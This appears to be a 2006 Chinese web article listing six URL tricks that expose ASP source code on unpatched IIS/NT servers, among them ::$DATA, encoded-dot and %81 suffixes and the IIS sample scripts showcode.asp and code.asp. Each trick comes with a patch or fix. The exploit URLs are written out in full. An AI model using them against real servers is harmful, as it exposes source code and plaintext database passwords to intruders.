偷看ASP原码的6种方法,ASP技术应用

汉南在线 → 网页设计 → Asp动态程序

偷看ASP原码的6种方法

作者：汉南居士
关键字：ASP技术应用

在没有打Services Pack6补丁的NT server上，至少有6种方法可以看到ASP程序的源代码,它们是:

1、

http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/SELECTOR/showcode.asp
解决方案:删除showcode.asp

2、

http://somewhere/something.asp::$DATA
解决方案: 装sp3

3、

http://somewhere/something.asp%2e
解决方案: 装sp4

or

http://somewhere/something.asp.(加一个点)
解决方案: 装sp4

4、

http://somewhere/something%2e%41sp
或者

http://somewhere/something%2e%asp
解决方案: 装sp4

5、

http://somewhere/something.asp%81
解决方案:装sp6或者打补丁

6、

http://somewhere/iissamples/exair/howitworks/code.asp?source=xxx.asp

最大的危害莫过于asp文件可以被上述方式读出；数据库密码以明文形式暴露在黑客眼前;

	来源：互联网阅读：331 次日期：2006-10-26
【双击滚屏】【推荐朋友】【收藏】【打印】【关闭】【字体：大中小】

上一篇：远程调用ACCESS数据库的源代码
下一篇：[原创]一段用ASP查看ASP文件源码的程序

>> 相关文章

·asp中怎么把access中指字的字段值全部加起来

·利用XML将ASP生成HTML页面

·asp与单选按钮

·ASP的Form集合

·用ASP判断文件地址是否有效

·ASP怎么判断网站上是否存在一个文件

·ASP+FSO+框架实现ASP生成htm并分页的方法(批量)

·创建一个ASP通用分页类

5.12汶川大地震遇难同胞默哀 | 汉南在线总站 | 免费电影 | BT电影下载 | 东莞信息网 | 流行购商城

授权使用：汉南在线 http://hnzx.hzwz.net/
经营许可证：陕ICP备05000109号 Powered by：汉南在线
Copyright (c) 2002-2007 汉南在线. All Rights Reserved .